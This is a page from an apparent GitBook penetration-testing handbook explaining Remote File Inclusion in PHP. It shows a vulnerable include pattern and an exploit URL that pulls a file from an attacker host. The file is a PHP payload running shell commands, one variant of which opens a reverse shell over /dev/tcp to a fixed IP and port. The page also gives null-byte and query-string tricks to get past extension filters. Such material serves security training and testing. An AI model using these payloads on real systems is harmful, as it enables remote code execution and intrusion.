SMK Muhammadiyah 2 Palembang
  • Introducation
  • The Basics
    • Basics of linux
    • Bash-scripting
    • Vim - Text Editor
    • Nano - Text Editor
  • Windows
    • Basics of windows
    • PowerShell
    • CMD - Windows commands
  • Scripting With Python
    • Python fundamentals
      • Useful Scripts
    • Transferring Files
      • Transferring Files on Linux
      • Transferring Files to Windows
    • Firewalls
  • Recon and Information Gathering Phase
    • Passive information gathering
    • Identify IP-addresses and Subdomains
      • Dorking Find Subdomains
      • Find Subdomains
      • DNS Basics
      • DNS Zone Transfer Attack
      • Identifying People
      • Search Engine Discovery
      • Active information gathering
      • Port Scanning
  • Vulnerability analysis
    • Server-side Vulnerabilities
      • Port knocking
    • HTTP - Web Vulnerabilities
      • Web-services
      • Common web-services
        • WAF - Web application firewall
          • WAF - Web application firewall
          • Attacking the System
          • Local File Inclusion (LFI)
          • Remote File Inclusion
          • Find hidden files and directories
          • SQL-injections
          • Nosql-injections
          • XML External Entity Attack
          • Bypass File Upload Filtering
          • Exposed Version Control
          • Failure to Restrict URL Access
    • Attacking the user
      • Clickjacking
      • Broken Authentication or Session Management
      • Text/content-injection
      • Subdomain Takeover
      • Cross Site Request Forgery
      • Cross-site-scripting
        • Examples
      • Browser vulnerabilities
      • Java applet
      • Automated Vulnerability Scanners
    • Exploiting
      • Social Engineering - Phishing
      • Default Layout of Apache on Different Versions
      • Shell
      • Webshell
      • Generate shellcode
      • Editing exploits
      • Compiling windows exploits
    • Post Exploitation
      • Spawning shells
      • Meterpreter shell for post-exploitation
      • Privilege Escalation
      • Privilege Escalation Windows
      • Escaping Restricted Shell
      • Bypassing antivirus
      • Loot and Enumerate
        • Loot Windows
        • Loot Linux
      • Persistence - Rootkit - Backdoor
      • Cover your tracks
  • Password Cracking
    • Generate custom wordlist
    • Offline password cracking
    • Online password cracking
    • Pass the hash - reusing hashes
  • Pivoting - Port forwarding - Tunneling
    • Pivoting
  • Network traffic
    • Arp-spoofing - Sniffing traffic
      • SSL-strip
    • DNS-spoofing
    • Wireshark
  • Wifi
    • WPS
    • WEP
  • Physical access to machine
  • Literature
Powered by GitBook
On this page
  1. Vulnerability analysis
  2. HTTP - Web Vulnerabilities
  3. Common web-services
  4. WAF - Web application firewall

Remote File Inclusion

Remote file inclusion uses pretty much the same vector as local file inclusion.

A remote file inclusion vulnerability lets the attacker execute a script on the target-machine even though it is not even hosted on that machine.

RFI's are less common than LFI. Because in order to get them to work the developer must have edited the php.ini configuration file.

This is how they work.

So you have an unsanitized parameter, like this

$incfile = $_REQUEST["file"];
include($incfile.".php");

Now what you can do is to include a file that is not hosted on the victim-server, but instead on the attackers server.

http://exampe.com/index.php?page=http://attackerserver.com/evil.txt

And evil.txt will look like something like this:

<?php echo shell_exec("whoami");?>

# Or just get a reverse shell directly like this:
<?php echo system("0<&196;exec 196<>/dev/tcp/10.11.0.191/443; sh <&196 >&196 2>&196"); ?>

So when the victim-server includes this file it will automatically execute the commands that are in the evil.txt file. And we have a RCE.

Avoid extentions

Remember to add the nullbyte %00 to avoid appending .php. This will only work on php before version 5.3.

If it does not work you can also add a ?, this way the rest will be interpreted as url parameters.

PreviousLocal File Inclusion (LFI)NextFind hidden files and directories

Last updated 2 years ago